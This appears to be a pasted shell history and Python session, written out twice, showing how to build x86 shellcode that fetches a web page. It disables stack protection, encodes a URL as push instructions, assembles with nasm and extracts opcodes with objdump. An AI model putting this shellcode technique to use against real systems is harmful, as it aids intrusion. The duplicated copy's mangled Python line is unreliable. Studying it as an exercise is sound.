nani1337 · February 4, 2019 18:48
diff --git a/custom shell code for downoading web page b/custom shell code for downoading web page
 391  nano custom_shell_storm.c
  392  gcc -fno-stack-proctector -z execstack custom_shell_storm.c -o custom_shell_storm
  393  gcc -fno-stack-protector -z execstack custom_shell_storm.c -o custom_shell_storm
  394  ./custom_shell_storm 
  395  gdb ./custom_shell_storm -q
  396  nano fix_shell.nasm
  397  cat fix_shell.nasm | cut -f2
  398  cat fix_shell.nasm | cut -f2 >final.nasm
  399  cat final.nasm 
  400  nano final.nasm 
  401  nasm -f elf32 final.nasm -o final.o
  402  python

 >>>url ="http://shell-storm.org/shellcode/files/shellcode-611.php"
 >>> rev = url[::-1]
 >>> rev
 'php.116-edocllehs/selif/edocllehs/gro.mrots-llehs//:ptth'
 >>> rev_hex = rev.encode('hex')
 >>> 
 >>> rev_hex
 '7068702e3131362d65646f636c6c6568732f73656c69662f65646f636c6c6568732f67726f2e6d726f74732d6c6c6568732f2f3a70747468'
 >>> 
 >>> rev_hex
 '7068702e3131362d65646f636c6c6568732f73656c69662f65646f636c6c6568732f67726f2e6d726f74732d6c6c6568732f2f3a70747468'
 >>> 
 >>> for item in map(''.join, zip(*[iter(rev_hex)]*8)) :
 ...     print "push 0x" +item
 ... 
 push 0x7068702e
 push 0x3131362d
 push 0x65646f63
 push 0x6c6c6568
 push 0x732f7365
 push 0x6c69662f
 push 0x65646f63
 push 0x6c6c6568
 push 0x732f6772
 push 0x6f2e6d72
 push 0x6f74732d
 push 0x6c6c6568
 push 0x732f2f3a
 push 0x70747468
 >>> 

  403  nano final.nasm 
  404  nasm -f elf32 final.nasm -o final.o
  405  objdump -d final.o -M intel
  406  objdump -d ./final.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
  407  nano custom_shell_storm.c 
  408  gcc -fno-stack-protector -z execstack custom_shell_storm.c -o custom_shell_storm
  409  ./custom_shell_sto
	391 nano custom_shell_storm.c
	392 gcc -fno-stack-proctector -z execstack custom_shell_storm.c -o custom_shell_storm
	393 gcc -fno-stack-protector -z execstack custom_shell_storm.c -o custom_shell_storm
	394 ./custom_shell_storm
	395 gdb ./custom_shell_storm -q
	396 nano fix_shell.nasm
	397 cat fix_shell.nasm \| cut -f2
	398 cat fix_shell.nasm \| cut -f2 >final.nasm
	399 cat final.nasm
	400 nano final.nasm
	401 nasm -f elf32 final.nasm -o final.o
	402 python

	>>>url ="http://shell-storm.org/shellcode/files/shellcode-611.php"
	>>> rev = url[::-1]
	>>> rev
	'php.116-edocllehs/selif/edocllehs/gro.mrots-llehs//:ptth'
	>>> rev_hex = rev.encode('hex')
	>>>
	>>> rev_hex
	'7068702e3131362d65646f636c6c6568732f73656c69662f65646f636c6c6568732f67726f2e6d726f74732d6c6c6568732f2f3a70747468'
	>>>
	>>> rev_hex
	'7068702e3131362d65646f636c6c6568732f73656c69662f65646f636c6c6568732f67726f2e6d726f74732d6c6c6568732f2f3a70747468'
	>>>
	>>> for item in map(''.join, zip([iter(rev_hex)]8)) :
	... print "push 0x" +item
	...
	push 0x7068702e
	push 0x3131362d
	push 0x65646f63
	push 0x6c6c6568
	push 0x732f7365
	push 0x6c69662f
	push 0x65646f63
	push 0x6c6c6568
	push 0x732f6772
	push 0x6f2e6d72
	push 0x6f74732d
	push 0x6c6c6568
	push 0x732f2f3a
	push 0x70747468
	>>>

	403 nano final.nasm
	404 nasm -f elf32 final.nasm -o final.o
	405 objdump -d final.o -M intel
	406 objdump -d ./final.o\|grep '[0-9a-f]:'\|grep -v 'file'\|cut -f2 -d:\|cut -f1-6 -d' '\|tr -s ' '\|tr '\t' ' '\|sed 's/ $//g'\|sed 's/ /\\x/g'\|paste -d '' -s \|sed 's/^/"/'\|sed 's/$/"/g'
	407 nano custom_shell_storm.c
	408 gcc -fno-stack-protector -z execstack custom_shell_storm.c -o custom_shell_storm
	409 ./custom_shell_sto